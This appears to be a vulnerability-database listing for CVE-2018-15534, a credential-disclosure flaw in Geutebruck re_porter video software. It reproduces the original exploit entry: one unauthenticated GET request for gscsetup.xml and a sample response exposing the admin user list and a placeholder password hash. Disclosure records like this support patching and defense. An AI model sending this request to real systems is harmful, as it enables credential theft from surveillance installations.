Geutebruck re_porter 16 Credential Disclosure

🗓️ 20 Aug 2018 00:00:00Reported by Kamil SuskaType

packetstorm🔗 packetstormsecurity.com👁 47 Views

Geutebruck re_porter 16 Credential Disclosure vulnerability in version prior 7.8.974.2

Reporter	Title	Published	Views	Family All 8
0day.today	Geutebrueck re_porter 7.8.974.20 - Credential Disclosure Vulnerability	23 Aug 201800:00	–	zdt
CVE	CVE-2018-15534	21 Aug 201816:00	–	cve
Cvelist	CVE-2018-15534	21 Aug 201816:00	–	cvelist
Exploit DB	Geutebrueck re_porter 7.8.974.20 - Credential Disclosure	22 Aug 201800:00	–	exploitdb
exploitpack	Geutebrueck re_porter 7.8.974.20 - Credential Disclosure	22 Aug 201800:00	–	exploitpack
NVD	CVE-2018-15534	21 Aug 201816:29	–	nvd
OSV	CVE-2018-15534	21 Aug 201816:29	–	osv
Prion	Information disclosure	21 Aug 201816:29	–	prion

`# Exploit Title: Geutebruck re_porter 16 Credentials Disclosure  
# Date: 03-08-2018  
# Exploit Author: Kamil Suska  
# Vendor Homepage:  
https://www.geutebrueck.com//media/_public/products/descriptions_archive/en/re_porter_econ_7.74007_IA_DE_EN_FR_ES.pdf  
# Version: prior 7.8.974.20  
# CVE-2018-15534  
GET /statistics/gscsetup.xml HTTP/1.1  
Host: example.com:12003  
  
<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">  
<Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">  
<Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>  
<Value Name="Password" ValueType="ntString"  
Value="##MD5passwordhash##"/>  
<Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>  
<Node Name="SecondUserList"  
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">  
</Node>  
  
Pozdrawiam  
Kamil Suska  
`

20 Aug 2018 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.17919